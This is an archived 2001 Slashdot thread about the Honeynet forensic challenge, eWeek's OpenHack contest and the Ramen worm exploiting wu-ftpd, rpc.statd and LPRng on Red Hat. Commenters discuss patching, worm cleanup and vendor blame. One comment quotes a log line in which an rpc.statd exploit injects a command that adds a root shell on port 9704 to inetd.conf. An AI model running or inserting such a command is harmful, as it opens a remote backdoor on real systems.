Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Encryption Security

Cracking All The Live Long Day & RH6/7 Worms 120

BoomMike writes "While the popular media drools over eWEEK magazine's contrived Open Hack Challenge, which offers modest cash prizes for cracking a carefully arranged network, real geeks can compete in the Honeynet Project's new Forensic Challenge, and pick up the trail of a hacker who cracked one of the project's Linux-based honeypots last November. Mount the file system images and pour through the IDS logs to figure out the who, what, where, when, why and how of the attack, and you can win a book. SecurityFocus has the story." In a much related vein to the Honeynet crack RH6.2/7 there's a story on C|Net concerning the "worm" that's a new popular exploit set with the script kiddies on RH 6/7 servers.
This discussion has been archived. No new comments can be posted.

Cracking All The Live Long Day & RH6/7 Worms

Comments Filter:
  • What if the guy knew it was a honeypot, and he wanted to get caught? What if he wanted you all to mount the file system images, so he could take over your computers? Maybe he'll use you all to mount a DoS attack on slashdot. Oh, the irony!
  • by Majix ( 139279 ) on Wednesday January 17, 2001 @10:48AM (#500627) Homepage
    I think Red Hat should put out a new 7.01 point release with all the security fixes included. If you're doing a fresh install today you actually have to download over 100mb of patches right after you've finished installing! While 100mb isn't anything these days it does take a little while and many newbies probably don't know about up2date etc.

    It would be much easier if they provided updated ISO images (yeah I know I could make them myself, and someone else probably already has). Sine Red Hat 7.1 is still a good way of I think 7.01 would be a good idea.
  • I believe a lot of the cheap CD houses offer RH7.0 with a CD of fixes ... Someone correct me if I'm wrong but isn't Eridani Linux a "Red Hat with the latest fixes"?
  • As others have said, if the rootpack had a simple "rm -rf /" or similarly damaging command in it's script, it would be a virus
    Actually, a virus is not distinguished from a worm by its destructive capability, but rather by its method of propogation. A virus is a bit of code that has to be attached to an existing executable program so that it can be run and thus do its work. A worm propogates itself without requiring a "host" executable. The ananlog is to the biological world, where virii do not duplicate/reproduce except when they are in another cell.

    BdosError

  • very valid point - so, is there a way to change that banner without the recompile? or, even just recompiling the thing to only change the banner should do this particular trick...
  • What does Honeypot want? Cheap forensic analysis on a cracked box?

    Well if you want to try, have a read of the Nov & Dec Dr.Dobbs. It has a pair of articles about recovering deleted data and has pointers to useful tools.
  • Nice wagon circling -- you deserve the karma.

    That having been said, a worm that targeted IIS4's FTP service and W2K's Print Server service, and had nothing to do with the usual Outlook/VBS/Desktop virus targets, would be treated to a 300 post flamefest on Slashdot, even if Microsoft had fixed the exploits months ago. Instead, we have 98 posts currently, most of them relatively demure.

    I'm actually kinda surprised that "Red$at" is getting such kind treatment around here today.
  • RedHat claims that the wu-ftp bug (RHSA-2000-039-02) only effects RH5.2 and RH6.2

    That's because the advisory was issued before RH7 was released. By all accounts, the buggy wu-ftpd still shipped with RH7. It would be rather silly to issue security advisories for releases in the future, wouldn't it?

  • i think you misunderstood - the worm only patches the hole so that this rooted box won't be rooted by someone else anymore, thus keeping it for the original intruder... not so that the hole is just patched out of good will towards humanity...
  • The vulnerabilities being exploited have been documented since at least Redhat 4 days. That they have not been repaired and the packages update is as inexcusable as the assorted Microsoft vulnerabilities.
  • Interesting ... In June of last year, my box got cracked using the exact same exploit, even down to the port 9704.

    The machine that got cracked had nothing on it, it was just a test machine I was setting up.

    When it was cracked, I thought the exploit looked pretty neat until I saw the same exploit over and over again. Damn script kiddie

  • Just slightly off-topic, but CNET doesn't have a "Rant" link so i figured I'd do it here :P There are times when I really despise the media, and this is one of 'em. CNET apparently doesn't understand, or at least doesn't care to share with it's readers, the difference between cracking a system and subjecting it to a DDoS attack. Yes, supposedly this new software being "tested" will keep your box from being cracked like a raw egg. But it doesn't, as CNET implies, protect said box from DDoS. Basically, the problem is that there are ignorant people writing these articles, and misinforming the public. But what can ya do?
  • I think the key part was "and such".

    It's easy to turn a vulnerability into virus. Linux has vulnerabilities. All the vulnerabilities used to create this worm were fixed last October but people still need to install the new RPM before the fixes do any good.

    Personally, I just type apt-get update && apt-get upgrade every couple days... That way all my programs stay fresh. :)

  • There have been what? 2 viruss {or how ever you wish to say it} for Linux or it's apps.. any one out there have a count of the number of MS viruss out there? I'll take those odds even if this one formatted my system rather then just closing the holes and looking for other systems with a less then atentive admin.
  • if you believe what this guy says on his summary of the worm.

    here [home.net]

  • Actually, you can disable echo in inetd, and you most likely should. Echo provides a nice DOS, one byte sent to it, uses two (send and reply) on your net connection, and you dont really need it.

    /*
    *Not a Sermon, Just a Thought
    */
  • However, these are the same things that have vulnerabilities in MS-land, and usually patches have been out. How many times have bugs been found in the NT kernel? Isn't it usually IIS? That is an add-on service.
  • yep thats it jonny-5- has defeated the evil admins that have opened up "www.openhack.com" he has a constant dos held down on their shitty servers/internet line.. they cant handle the force of jonny-5- so openhack.com u guys can just fuck off
  • Actually, you don't need to re-install to get rid of it, as it doesn't actually touch any of your binaries. Just boot in "emergency" mode,

    rm -R /usr/src/.poop
    comment out the "asp" stuff in /etc/inetd.conf
    rm /sbin/asp
    change your passwords (an email was sent - not sure what the contents were)
    remove the "asp" line in /etc/rc.d/rc.sysinit

    The ftpd hole was fixed for you, and you also need to make sure rpc.statd is turned off.

    I'd also suggest you go through your logs so you can see who gave you the worm, so you can tell them that they've been 0wn3d.

    Also, _all_ of your index.html files have been replaced by a ramen advertisement.
  • Actually, it is destructive - it replaces _every_ index.html on your system with an advertisement for Ramen.
  • I think the problem is that most people confuse the "potential" for better code, with "automatic" better code. Just because I release the source code doesn't make it secure. However, you _can_ find programs that have been secured. Open-source does not remove the need for security-conscious people, it just gives them better tools. With source code, if you get 0wn3d, its your fault. With proprietary code, it's the other guys fault :)
  • Turning off services is much better than hosts.allow/deny.

    the problem is that most of the distributions started out making an OS for Sysadmins, and they can't get it out of their system. Ever heard of a network exploit for Corel Linux? Why not? It's for users, and doesn't have _any_ services running. When someone clicks on "desktop install", that's what they should get. Then you don't have to mess with files like hosts.allow/deny, ftpusers, and stuff like that. If you want to run an FTP site, then you should know how that stuff works, but most desktop users don't even know that they are running an FTP site, and that is the distributions fault.
  • Wow, you must be one rich SOB. The "moderate" sum for cracking the E-Week box is $50,000.00.

    Moderate to you maybe, but a nice kick in the income ass to me.

  • But then Microsoft have brought this venom on themselves by their anti-competitive practices, so MS loyalists should not be surprised at the venom that is directed at them. RedHat isn't particularly popular with the /. crowd either, but then there are plenty of Linux vendors to choose from, unlike in the Windows market.
  • I tried to include a tiny Perl program ... But it got rejected: "Junk character post". Sorry.
    LOL!

    If you mod this down, be a darling and mod the parent up. And vice versa.

  • that's such a brittle mechanism for determining a vulnerable machine that it could EASILY be defeated by simply changing the banner.
    And it could easily be defeated by patching wu-ftpd. I suppose the general trend of broadcasting your module name and version could be criticised for inviting this kind of attack. It may be worthwhile compiling all of the various ftpd signature strings into your ftpd, and modding it to send a random one each time.
  • by cyber-vandal ( 148830 ) on Wednesday January 17, 2001 @10:51AM (#500652) Homepage
    Yes, although MS driving competition out of the web browser and mail client markets, combined with lying about the abilities of MCSEs makes a virus far more likely to spread as the desktop is virtually the same everywhere and the servers are less secure. That isn't a problem with the OS per se, but more a problem with a lack of competition in the market.
  • Someone was nice enough to put warez on my ftp site (moved from DSL on a small local provider to @home, and got a real job, so I was not watching hard).

    Been watching the IP's trying to connect through the firewall log, and came upon a site that was now obviously cracked, with the "RameN Crew--Hackers looooooooooooove noodles."
    Sent a message to the abuse contact, but never heard back. Many of the IP's attempting to connect have been cracked.

    Maybe we sould put a few more honeypots out on the big cable and DSL providers.
  • Are you sure they kept the holes open? Wuftpd is fixed out of the box for 7.0 and there is an update for LPRng.
  • by Scoria ( 264473 ) <slashmail@ i n i t i a lized.org> on Wednesday January 17, 2001 @11:09AM (#500655) Homepage
    The "myth" isn't so untrue. Remember, you have to have vulnerable versions of rpc.statd and wu-ftpd installed/running for this 'worm' to gain access to the machine. That's really the system admin's fault for not keeping up to date.

    Linux and other *nixish OSes are fairly "virus-resistant" (no OS is "virus-proof") as long as you don't run the virus as root, apply the patches for known security issues, and basically do your job as a sysadmin...
  • That AC and SealBeater both had extremely good points. A worm is totally different from a virus anyway. (I replied to the guy's post that *nix was virus-resistant being a myth, not that *nix was worm-resistant. ;))

    I don't even think something like this would even require special privileges unless the machine was extremely restricted...
  • This is an interesting ecological approach to the security problem though. :-)

    A worm that has the sole job of wandering around and fixing the exploit wherever it finds it and using the box for a little while to find other exploitable boxes, then moving on.

  • For several reasons, this seemingly-great "set a worm to fix a wormhole" idea is NOT useful.

    For starters, consider this scenario:
    1. You know your machine is vulnerable, so you check out its wu-ftpd and rpc.statd binaries and the various logfiles. Whoa, there are worm tracks here! How do you KNOW (not just suspect, KNOW) whether the "bad" worm or the "good" worm was here?

    2. Assume that the "good worm" has been coded to announce and identify itself. A) Most victims won't be able to judge whether to believe it, and B) the forthcoming "bad worm variant 2" will pretend to be the "good worm" anyway, so the ID cannot be trusted in the first place. The "bad worm variant 3" will be even better at hiding its damage while pretending to be the "good worm".

    The net result: Systems hit by the "good worm" will have to be cleaned up and rebuilt just like systems hit by the "bad worm", unless the sysop/user is too clueless to notice the presence of either one. Thus, the "target audience" for this hypothetical white-hat is limited to clueless users who haven't already been hit by the "bad worm". To say nothing of the lawsuits unleashed by offended sysops who had to clean systems "your" worm "attacked".
  • Thats because you use your +2 bonus on comments that don't deserve it. Like the one you just posted. (I'm not that moderator though. Can't say I wouldn't like to be. *grin*)

    That may be true... *shrug*.. I keep forgetting I've got +2, I spent so long at 1... (and I'll be back there soon at this rate... :)

    But oh, what a ride... burn, karma, burn.. :)

  • If this were a Microsoft product, many slashdot readers would start saying "This is what you get" and "M$ sucks!"

    In reality, most security issues with Windows are of the same ilk: Admins that haven't a clue as to what they are doing and manage to fsck everything up and leave holes wide open.

    Next time you read about some hole in Windows, or are tempted to say something smug about Windows 2000 security: Just remember this.... Nobody likes a smart ass, especially a hypocritical one :)


    -
    The IHA Forums [ihateapple.com]
  • I'm getting a bit worried, that since this worm is out there.. some script kiddie is going to get a copy of it, and "evolve" the damn thing.

    Maybe make it more damaging... maybe ahve it report the hacked IP #'s via IRC, or some other medium... And also have it open up a few other holes on each system, before it goes along its merry way...

    I shudder each time I think about this happening to all of the unsecured RH 6.2/7 boxes setup on all of those cable modems/DSl lines out there. (High bandwidth availability+unsercure box=Nasty Mess)

    A few friends of mine run default RH setups on their DSL lines.. I might be over reacting, but I sent a few panic stricken emails out to them with links to the worms analysis, and links to download the patched RPM's.. (plus a personal rant about setting up IPCHAINS, and such..)

    Call me a worrywart, but I really don't want to see this thing get out of hand...

  • This wu-ftpd bug was widely reported in June and observing system admins plugged it already. According to CERT's security advisory [cert.org] older versions of proftpd also required updating.
  • You are grossly misinformed. Did you even read the Honeynet page? Their project is to take a cracked box (actually disk dumps of) and piece together the "who, what, when, how, and maybe even why" it was cracked. It's a learning experience, not a cracking exercise.

    Perhaps you should read the article before you post such flamebait. r

  • I'm confused. When SDMI came out and said to us all "crack our shitty standard for us," the community cried foul and denounced the competiton as doing the dirty-work of the evil SDMI people. Yet when the Honeynet and OpenHack people come out and say the same thing (except that this time we're doing RH's work), it's praised as a cool way to show off your l33t hax0ring skillz. What's the deal? Do we like the latter because it contains those five magic letters: L-I-N-U-X, but denounce the former because it would take away our "right" to tradeable and copyable MP3s (which is a whole seperate issue)? The purpose shouldn't matter; this issue is that of doing the security-checking of another company.

    I'm confused, people. Which one is it? Yes or No for hack contests?

  • Upon reviewing the excellent technical summary over at Securityfocus [securityfocus.com], we found that Immunix [immunix.org]'s FormatGuard [immunix.org] stops all three of the exploits that Ramen uses: Crispin
    ----
    Crispin Cowan, Ph.D.
    Chief Research Scientist, WireX Communications, Inc. [wirex.com]
    Immunix [immunix.org]: Free Hardened Linux Distribution
  • I've helped lots of people get to Linux actually. They do need their hands held until they can get the hang of things. It's not intuitive for most people to immediately install an operating system and come to the realization that the first thing they must do is secure it. This is a problem that seriously annoys me about Red Hat and some other Linux distros, as people should only need to learn about securing services if they want to run them. When I first learned Linux back in 96, I was running a horribly insecure system with every service running. I didn't even know how to update it. It pisses me off that Linux vendors don't accomadate new users who don't know better yet.

    But what I really don't understand is why you're upset.
    ---
  • When I first decided to leave my box on 24-7, and connected to the Internet, I was naive enough to think since I had nothing important to offer, no one would bother hacking it.

    I got hacked though through the Wu-ftp bug, which I was aware of -- but like I said, I didn't think anyone would consider my stupid box worth attacking. Fortunately, they didn't do much damage. They deleted the /usr/bin directory then appeared to have left. I deleted all accounts and changed passwords just in case it was more than just flexing muscles. I think they just wanted to take it offline, since it was running an Eggdrop on IRC. I'm glad they did it though, and that they kept trying to break in for weeks after that (I could tell from looking at the logs.) It helped show a newbie what to do and what not to do. I would have been a lot more upset though if they deleted some of my important data.
  • Thanks for the information. Now that I know what to look for I can check out the few systems that I have installed.

    I won't need the perl program as I'll fix any holes that may be open.
  • Yes you are, new users. sure you and most people here know all that stuff but frankly I didn't even know there /was/ such a thing as hosts.allow or a hosts.deny file untill some one started scanning my system. I wouldn't have even noticed if not for something on SlashDot talking about IPchains. I turned it on and wow.. the things I discovered. I did a full reload incase I had been cracked and reset up, I found out about the hosts.allow and deny so I tried to set it up. unless you already know what you are doing it is rather hard to find out the format the two files need to be in. lets face it alot of clueless people are getting into Linux and I was one of them. we need to put out something that covers the things people here assume every one already knows. I thought I had my system closed through the deny and allow files for a week befor I discovered that I had the wrong format and they were doing nothing. I have corected it now but thanks to this ramen problem I have discovered that I needed to do more {no I haven't been hit.. I atleast know to keep up-to-date}. How meny of you knew on your first install of Linux that you had to change the hosts.allow and the hosts.deny? how meny of you knew the format to use? how meny of you knew that you could add anonymous to ftpusers to close anonymous FTP? I know I didn't know any of this when I first started. I am learning and we need to stop bashing those that don't know and help them find out. remember even /you/ had to learn this at one time. you were not born all knowing.
  • My firewall is logging one or 2 attempts at port 111 each day, and slightly more attempts to access my non-existant FTP server ....
  • The purpose shouldn't matter; this issue is that of doing the security-checking of another company.
    The purpose may not matter to you, but it sure matters to me. The purpose is everything in this distinction. eWeek are saying "Hey, come help us test the security on these servers". Honeynet are saying "Hey, come learn about tracking down crackers". SDMI were saying "Hey, come help us fuck you over in the future".
  • Points one and two attempt to refute the remote possibility that 'benevolent involuntary root patching' (Or BIRP, as I like to call it - excuse me) could gain credence as a legitimate tactic for updating daemons. You're right, but consider this scenario:

    A 'good worm', nearly identical to this one, is periodically distributed from an unknown location, armed with the latest and most popular exploit and the correct scripting to retrieve the binaries to fix the vulnerability. It compromises the system using the exploit, silently fixes the problem, propogates itself for a fixed amount of time, and rm's itself from the box.

    And, in the grand tradition of survival of the fittest: the real sysadmins will have already patched, or will be rooted and do a clean rebuild once they notice. The clueless users will be protected from raining DDOS and IRC bot madness onto their fellow Internet denizens for another day.

    There's nothing like being owned to make you a better sysadmin, and this method ensures that no one else will hijack your system through the same exploit while you're waiting to notice that something fishy has gone on. Morally, this argument doesn't hold water, but practically, it could eliminate a whole class of script kiddie problems before they start, by harnessing the power of the exploit for something beneficial.

  • Has anyone managed to unsubscribe once they found your email?

    I used to have a free subscription to macweek, which seems to be where they got the email address they use. They took it on themselves to take this as consent to receive eweek a couple of years later. I've emailed them demanding that they stop. I"ve sent abuse complaints upstream. Nothing seems to work.

    For some reason, i doubt that frims that build their subscription numbers this way have enough of a clue to tell me anything interesting . . .
  • There goes the assertion/urban myth that Linux was proof against virii and such.

    Look at the crack, it exploited wu-ftpd. Anyone dumb enough to run that program with pathetic security deserves to be cracked. Run something like ProFTPd if you need FTP, or even better, the Linux port of OpenBSD's FTPd.

    Also, use a good distribution (like ROCK Linux [rocklinux.org]). Or at the very least, Mandrake.

  • Thank god - someone else on these forums that isn't linux/free software brainwashed. ALL OSes have their weakness. I still maintain the reason Linux _seems_ so secure and virus free is _because_ there has been little reason to crack/hack. It has little penetration on the desktop. It has little penetration for corporate file servers. It's only recently that it's become popular for web servers (and I mean corporate, not your bedroom, before someone fires at me) and, ta-da! cracks/viruses appear. I don't think it's any better or any worse than windows. Now, M$ does suck, but because of business practices, not software.
  • by wiredog ( 43288 ) on Wednesday January 17, 2001 @09:45AM (#500676) Journal
    It's in rpc.statd and wu-ftp. More info at CERT [cert.org]
  • You forgot that if you have a real problem, you can't demand support from anyone.
    You forgot that no one makes much money programming under Linux
    You forgot that the reason there's been little hacking/virusing of Linux is because there are so few linux boxes out there compared to MS boxes. (this ones my favorite 8) )
    Who the hell wants to base the future of their company on free software? Only morons.

    I think that about sums it up.
  • by 2nd Post! ( 213333 ) <{ten.llebcap} {ta} {raebdnug}> on Wednesday January 17, 2001 @09:46AM (#500678) Homepage
    There goes the assertion/urban myth that Linux was proof against virii and such.

    I would think a *horrible* vector would be one that alternated Windows/Linux targetting.

    A Windows virus that targets Linux, transmutes itself, than looks for other Windows machines on the network.

    Rinse, lather, and repeat.

    Geek dating! [bunnyhop.com]
  • You never know what kinds of backdoors and trojans have been left behind when you were owned. Nor will your logs really help you, as root can change them however to cover his tracks.
  • by marks ( 12185 ) on Wednesday January 17, 2001 @09:53AM (#500680) Homepage
    LinuxSecurity.com [linuxsecurity.com] is offering bandwith to download the images at http://honeynet.linuxsecurity.com/ [linuxsecurity.com]

    A project such as this does such a good job of exposing users to the methodologies of the black hat community. This is a great project for anyone who has even been hacked or might be hacked in the future. Its an excellent idea to play with a compromised system to see what one looks like, what gets "messed with" and what needs to be fixed.

    -mark
  • Game Boyeeeeeeeeee!?

    if you have a real problem, you can't demand support from anyone.

    Have you ever had a "real problem"? At my last job, about 1999, a whole string of win 95 machines blew up. Who's problem was it? It was our problem. What was the fix? Buy Win 98. Some support that was. I wish it was as easy as apt, downloading a patch, or even ordering a $4 CD. Oh yeah, about 1 man year's worth of work was lost between them all.

    You forgot that no one makes much money programming under Linux

    Life's a bitch. We can't all be like Bill Gates and fuck the world over. I'm happy enough making an honest living, how about you? I'd go into consulting if I were you. There are plenty of angry MS customers all happy to pay for your time.

    Who the hell wants to base the future of their company on free software? Only morons.

    Free software is the future. Get used to it or perish.

  • by fizbin ( 2046 ) <martin@@@snowplow...org> on Wednesday January 17, 2001 @09:57AM (#500682) Homepage

    This worm has been being discussed on the incidents (not bugtraq, as C|Net says) mailing list.

    It's basically a bunch of existing tools snapped together by some brute-force driver scripts.

    My analysis is at http://members.home.net/dtmartin24/ramen_worm.txt [home.net]. Fifteen minutes of fame, here I come!

  • The vulnerabilities being exploited have been documented since at least Redhat 4 days.

    That's an outright lie. Care to back it up with some proof?
    The wu-ftpd vulnerability used by these worms is with wu-ftpd versions prior to 2.6.0, and this vulnerability affected every single Linux distribution that included wu-ftpd (most do). Guess what? The hole was discovered, and wu-ftpd 2.6.0 released, after Red Hat 6.2 had been released for some time. An updated wu-ftpd 2.6.0 package was issued as a security fix for Red Hat 6.2 [redhat.com] by Red Hat shortly thereafter.

    The LPRng problem was detected very shortly after Red Hat 7 was announced. A fix was released immediately [redhat.com].

    That they have not been repaired and the packages update is as inexcusable as the assorted Microsoft vulnerabilities.

    Please check your facts before spouting off such FUD and lies. Or maybe I just responded to a troll, posting at +2...

  • I'm actually kinda surprised that "Red$at" is getting such kind treatment around here today.

    It's spelled "Red Hat". Would you please care to explain why you write that name with a dollar sign?

  • I know about computers.

    What would I want a lady for??

    And while I'm on the subject, security is *both* product *and* process. Sure, I'd be stupid not to have the latest patches and train my users. But I'd also be better off not allowing them to use MS Outlook, and IE (remember the scripting bug [l0pht.com] that allowed one to catch a virus from simply browsing the web?)
    ---------------------------
  • Should I work on cracking a machine, and get $50,000 crisp US Dollars, or should I work on finding who cracked a machine, and get a 10 dollar book. Hm. This is a hard decision.

  • by rwm311 ( 24383 ) on Wednesday January 17, 2001 @10:06AM (#500687) Homepage
    The point of the Honynet Project is to raise awareness and teach the fundamentals of forensics. The book is just a "job well done" and pat on the back.

    The OpenHack challenge is just another one of those crack-this-box challenges which you see every month or so. Not to take anything away from it, but I find forensics much more interesting. What do you find more interesting: trying to crack a box, or trying to produce a cost-analysis report and details on _who_ cracked a box. I'll take the forensics any day.

    rwm

  • by Bonker ( 243350 ) on Wednesday January 17, 2001 @10:09AM (#500688)
    Since what makes Windoze a popular target for Virus and Worm hackers is its popularity. Since the popularity of Linux is growing (RH in particular as the distro most well known outside the hacker community), it was only a matter of time until someone started exploiting security flaws that plague non-experienced user/administrators.
  • How come the person who successfully hacks a system can win $50,000 while in an unrelated contest the person who can track down a hacker wins a copy of McGraw-Hill's Hacking Exposed, a $28 value?

    Because it's generally easier to sell someone a security system to keep your house from being broken into, than a camera that will only tell you where they went after they left.

  • by Ringwraith ( 230940 ) on Wednesday January 17, 2001 @10:10AM (#500690)
    If this was a story about MS2000 or something, it would be full of comments about how crappy it is. Now it's a story on Linux, and all anyone can talk about is how "it really isn't that bad" and "worms happen." It "really isn't that bad" because it wasn't made to destroy anything--odds are, the next one will be.
  • by Hard_Code ( 49548 ) on Wednesday January 17, 2001 @10:12AM (#500691)
    Cracking All The Live Long Day & RH6/7 Worms

    The title immediately conjured an image of internet worms, self-replicating, and using host machines to number crunch (in the distributed.net case, "crack"). Imagine a Seti@home or distributed.net worm.

    Now *that* would be a decent worm. ;)

    "Why are these processes eating up all the CPU! Why are they talking to setiathome.ssl.berkeley.edu!"
  • The 'after-the-hack' is more interesting, but if you are just going after the prize..

    Just cracking the box is easy. All you have to do is just find the one patch the admin did not install, and then use that, toss a wedge in it, and soon you have r00t.

    Trying to find out who put that wedge in place, is a litte more difficult. It takes skill, knowledge, and some luck.

    By the time I post this, I am sure it will be redundant, but ah well, I won't post with score bonus.

  • by e_n_d_o ( 150968 ) on Wednesday January 17, 2001 @11:45AM (#500693)
    I still don't understand why every network service isn't turned off by default. If you need it, you better know how to keep it secure. If you know how to keep it secure, chances are you know how to turn it on.

    AFAIK, any normal RH Linux box needs these system services:

    crond
    keytable
    random
    syslogd
    xfs (if running X)

    A box with this config will produce the following "netstat -l" has no externally open ports except echo. The only exception to this is when running X, port 6000 will be opened (personally I firewall this).

    The only thing that MIGHT want to be turned on by default is SSH. But there's really no reason that the user shouldn't have to do event this themselves.

    The problem is obviously the entry-level Unix/mid-level MS users who are starting to use Linux. They need their hands held. So put a $!@#$ memo in the installer that says to read "services.txt" or something to get your system services going. Or, perhaps RH should open a web browser with a "Configuring Services" FAQ when you login to X as root (most people do this, annoying enough).
    ---
  • One moderator, so far, thinks I'm trolling. Another moderator thinks I'm interesting.

    I think I've got a moderator following me around with an itchy finger on the "Overrated" trigger.

    Take heart, brother. :)

  • When are the distribution makers going to learn? wu-ftpd is riddled with bugs and security holes. Why does something like this come standard with the world's most popular Linux distribution?

    (Ideally it would come with proftpd, but with it disabled out-of-the-box...)
  • It should certainly be available as an ISO even if they don't want to go to the trouble and expense of changing their shrinkwrap version.

    HELL, they could even slap the disc on the outside of the box in a little envelope really...
  • I'm not sure who's comment's you have been reading. Most of what I've seen has been helpful stuff about how this happened, what to do to keep it from happening and what to do it has happened. The remedy should be familiar to anyone who's used MS ware, reinstal! There however the similarities between the Linux and the MS world end. What a great opertunity to slap around MS, thanks!

    Differences to be noted:
    1. Problem is presented quickly and fully.
    2. Problem can be prevented by changing text based config files.
    3. Problem can be patched at no cost.
    4. No cost was incured to begin with. Who wants to bash volunteers?
    5. Reinstal will not subject you to liscence keys, bogus copy protection schemes, and outright adverts like, "Everything you do will be easier and more fun. Be sure to register today!"

    The ranting seems to be all yours. Get thee hence, MicroTurd.

  • My RH7.0 box included an "Errata CD" along with a leaflet titled "Mandatory Errata Installation Instructions."

    The bad news is that it only contained the fixes for rhnsd (up2date). It would be nice if RH would continue to include full-fledged Errata CDs, rather than rely upon up2date, but I have a feeling that this was a one-time thing. Kudos to RH for stepping up, though.

    Ideally vendors would include pre-patched distributions when new disc manufacturing runs are ordered. The primary example I'm thinking of is Microsoft: it would have been nice for MSDN to include a Windows NT 4 SP 6 full install disc, rather than require you to install NT 4 and then service packs. (You can't even run Windows Update since NT4 includes IE2.0!)

  • these same types of vulnerabilities into their products time and time again. It's one thing when a vulnerability is truely ORIGINAL, but 99% of these are derivative and much older vulnerabilities that could have been detected IF someone checked for them. As a product of carelessness, sure it can happen, but for supposedly legendary "peer review" where thousands of programmers are supposed to check, it should RARELY ever happen. Yet RedHat and most other distributions never fail to release a new distribution with at least 5 remote vulnerabilities, many with the same servives--over and over. I'd at least expect RedHat to check....

    Oh well, I've got to run. I believe in the POTENTIAL for Open Source to be a mechanism for secure code (at least for certain TYPES of code), but it's generally not happening today.
  • by Fjord ( 99230 ) on Wednesday January 17, 2001 @02:02PM (#500700) Homepage Journal
    RedHat claims that the wu-ftp bug (RHSA-2000-039-02 [redhat.com]) only effects RH5.2 and RH6.2
  • Except that RH7 isn't effected by this, and they have a page for RH7 security patches [redhat.com] that link to the appropriate RPMs, and one linking to this and other Bug fixes and package enhancements [redhat.com]
  • /me raises my hand

    When did $50,000 there offering for the person who can crack the system not be worth it. Truth be known, I would probably be working on it I had those kind of schools. (Sorry boys and girls, I do data analysis). What's a security cost anyway? And if your a part of a company how much do you think you would actually make from it. (Independent contractors would also be helpful.) But still, its $50K! Seems like a lot of folks stock options would be so far underwater that it would be worth it.
  • Suggest you check out the KRUD distribution -- based on RH 7.0; it's been endorsed by Eric S. Raymond & is explicitly targeted at tightening RH's security. It's at . I've got a yearly subscription & it's saved me a lot of hassle. My wu-ftpd for RH6.2 was patched long ago...
  • Okay, the link for KRUD is here [tummy.com].
  • Looks like one way is to just look for /usr/src/.poop directory since he doesn't mention that it cleans up that stuff.
  • by Colitis ( 8283 ) <jj.walker@noSpam.outlook.co.nz> on Wednesday January 17, 2001 @08:21PM (#500710)
    e_n_d_o said:

    A box with this config will produce the following "netstat -l" has no externally open ports except echo. The only exception to this is when running X, port 6000 will be opened (personally I firewall this).

    I say:

    You don't need to firewall 6000, if you add "-nolisten tcp" to the end of the line that starts the X server. On the Mandrake system I'm currently using, with gdm as the login manager, it's in the servers section of /etc/X11/gdm/gdm.conf. If using xdm (or kdm) its probably the last line in /etc/X11/xdm/Xservers. On FreeBSD, using xdm, its in /usr/X11R6/lib/X11/xdm/Xservers.
  • Unfortunately for Microsoft, they brought the bad publicity (and antitrust lawsuits) on themselves in their quests to integrate everything in their OS. While IIS was kind of an add-on (it came in an option pack) it is now built in windows 2000.

    One of the vulnerabilities is ws-ftpd. Make by Washington University, it runs on any unix.

    Also, in this case there were patches for these two vulnerabilities BEFORE this worm was even created.
  • by JCCyC ( 179760 ) on Wednesday January 17, 2001 @10:13AM (#500715) Journal
    What scares me is that RH7 still ships with the vulnerable, unpatched version of wu-ftpd. Wasn't that hole fixed ages ago?

    Hopping through CERT and eventually into Red Hat I found this [redhat.com]. Fixes only for RH5 and RH6 (RH7 didn't exist at the time). I can't get to RH's FTP to check the status for wu-ftpd in RH7 right now, but their list of security advisories for RH7 does not mention wu-ftpd.

  • This simply isn't true. RH7 shipped with wu-ftpd 2.6.1. According to WU-FTP [wu-ftpd.org] the bug only effects before 2.6.0. It also has 2.6.1 as te latest release.
  • by Anonymous Coward on Wednesday January 17, 2001 @10:15AM (#500717)
    You're right, in a sense. If this was happening to win2000/nt systems, a lot more people would be claiming that it represents a problem with the OS, instead of correctly interpreting it as a problem with admins not knowing how to set up their own systems.

    Thing is, these are not new exploits. They're known, and easily patched. Anyone who gets hit by this worm shouldn't be operating a web server.

  • [root@elite RedHat-7.0-RPMS]# ls -la wu-ftpd-2.6.1-6.i386.rpm
    -rw-r--r-- 1 root root 196336 Aug 30 18:16 wu-ftpd-2.6.1-6.i386.rpm

    As far as I know this is not vulnerable. The wu exploit that most people use has these offsets harcoded:

    0 - RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
    1 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm

    So I do not think it is. The only exploit I know of for Red Hat 7 is the lpd one. AFAIK RH 7 does not even install inetd (xinetd) by default.

    r

  • In his analysis [home.net] he says RH7's vulnerability comes from LPRng, not wu-ftpd. A patched version of LPRng is offered as an update by Red Hat here [redhat.com].
  • Yes, I know I'm an idiot for not patching/firewalling my system. However, I got hacked (note, though, the servers I maintain did not get hacked, even though I'm relatively certain it was tried). I love getting 0wn3d. Oh well.
  • Sad to admit I had a box cracked with the rpc.statd exploit. The box wasn't anything particularly special, in fact, it was outside the firewall and expected to be cracked some time. Not a honeypot but just a server we didn't care if it did get cracked. Nothing seemed to have come of it and the box has since been rebuilt but for the interested, here is the log file the crack generated as caught by Logcheck [psionic.com]:

    rpc.statd[443]: SM_MON request for hostname containing '/': *INSERT BUNCH OF CRAPPY CHARACTERS*/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

    There were a lot of funky characters in the middle that slashdot wouldn't take.
  • by ryanr ( 30917 ) <ryan@thievco.com> on Wednesday January 17, 2001 @10:27AM (#500723) Homepage Journal
    For which, the Ramen worm? It also uses the LPD hole, in RH7.0. Check out this comment:
    http://slashdot.org/comments.pl?sid=01/01/17/18362 35&cid=12 [slashdot.org] by the guy who posted a well-done analysis to the incidents list.
  • I know it's been discussed before, but wouldn't it be useful for someone to hack the worm to run around and close up the security holes without damaging the system? It could use an exploit to gain root, rpm -U the packages, do a bandwidth-limited scan for 24 hours and then clean up after itself.
  • by Rudeboy777 ( 214749 ) on Wednesday January 17, 2001 @10:29AM (#500726)
    It's pretty sloppy for RH to leave security fixes for these holes out of 7.0, but anyone running a server on a high-bandwidth line should probably know enough to get security updates frequently. Nobody deserves to get hacked, but you need to expect the worse as a sys admin. Leaving the default install on a server is absolutely amateurish.
  • by Speare ( 84249 ) on Wednesday January 17, 2001 @12:12PM (#500727) Homepage Journal

    I expect this'll get modded down, but...

    It seems that the RedHat exploit is at least as big a story as the Honeypot project. While they're both 'cracker' related, one is an opt-in research project and one is an advisory news item.

    Don't they deserve separate top-level stories to clear it up? This isn't some downgraded Slashback or quickies thing. Both deserve their own thread.

